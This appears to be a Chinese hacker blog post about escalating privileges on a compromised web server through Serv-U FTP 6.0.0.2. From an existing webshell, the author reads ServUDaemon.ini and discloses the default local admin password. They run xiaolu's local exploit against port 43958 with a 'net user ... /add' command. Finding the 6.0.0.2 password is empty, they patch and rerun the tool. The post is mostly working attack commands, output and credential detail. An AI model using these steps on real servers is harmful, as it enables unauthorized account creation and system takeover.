天獲得一個webshell.發現了serv-u目錄.看了下ServUDaemon.ini
[GLOBAL]
Version=6.0.0.2
OpenFilesDownloadMode=Exclusive
PacketTimeOut=300
LocalSetupPassWord=ah6A0ED50ADD0A516DA36992DB43F3AA39
6.0.0.2版的.曾經看到哪說6.0版的默認本地管理帳號和密碼依舊是原來那個.可又好像聽誰說過6版的密碼已經改了..
呵.這裡發現.多出了一行LocalsetuppassWord.有種不詳的預感.難道原來的默認密碼已經通過它來設置了?加了MD5,算算純數字倒還是可以.機會渺茫..
試試能不能寫入...顯示權限不足(一切都在預料之內).OK試試默認帳戶和密碼吧.
上傳了xiaolu的那個serv-u權限提升工具
netstat -an |find "43958"
TCP 127.0.0.1:43958 0.0.0.0:0 LISTENING
嗯,是這個口.
執行命令
D:/web/www/XXXX_com/serv-u.exe 43958 "net user xiaoqi amen. /add "
******************************************************
Serv-u <3.x Local Exploit by xiaolu
>221 Serv-U FTP Server v6.0 for WinSock ready...
>331 User name okay, need passWord.
******************************************************
#l@$ak#.lk;0@P
>530 Not logged in.
******************************************************
看到530,心涼了一下,這麼說來默認密碼被改了.
上群裡想獲得一下確認.Superhei給了個很好的思路.下載主程序用UEDIT查看密碼.
serv-u 6.0版之前要修改默認密碼也是同樣的方法,而且密碼長度要求同樣要求是14位(用其他字符替換#l@$ak#.lk;0@P)..
打開ServUAdmin.exe查了下,發現密碼依舊是#l@$ak#.lk;0@P(特地復制到記事本觀察,防止0/O l/1等字符混淆).確實沒有變.
那麼,看來Serv-u已經不依靠它來驗證了?
為了找出真像.下載了一個Serv-U 6.0.0.2版(未裝漢化,未破解,防止低版本漢化及破解補丁)
之前就在想,為什麼Serv-U不可以提供一個讓管理員修改密碼的地方了?多少個服務器OVER的責任在Serv-U上啊?
好!這次來了,剛打開serv-u admin,發現在"停止服務"下面多了一個"設置更改密碼"的按鈕.
再來看看ServUDaemon.ini,除了版本改變了以外,與原來並沒有不同之處.
回到控制台點開"設置更改密碼"要求輸入舊密碼,新密碼,確認.舊密碼?舊密碼是什麼?#l@$ak#.lk;0@P嗎?
提示密碼不正確..怪了.試了下空密碼...正確..這可把我郁悶了.難道在Serv-U 6.0.0.2裡LocalAdministrator的密碼就是空???
把xiaolu的權限提升工具拿來改了下,把密碼改成空.編譯好重新傳了上去.
執行命令
D:/web/www/XXXX_com/serv-u2.exe 43958 "net user xiaoqi amen. /add "
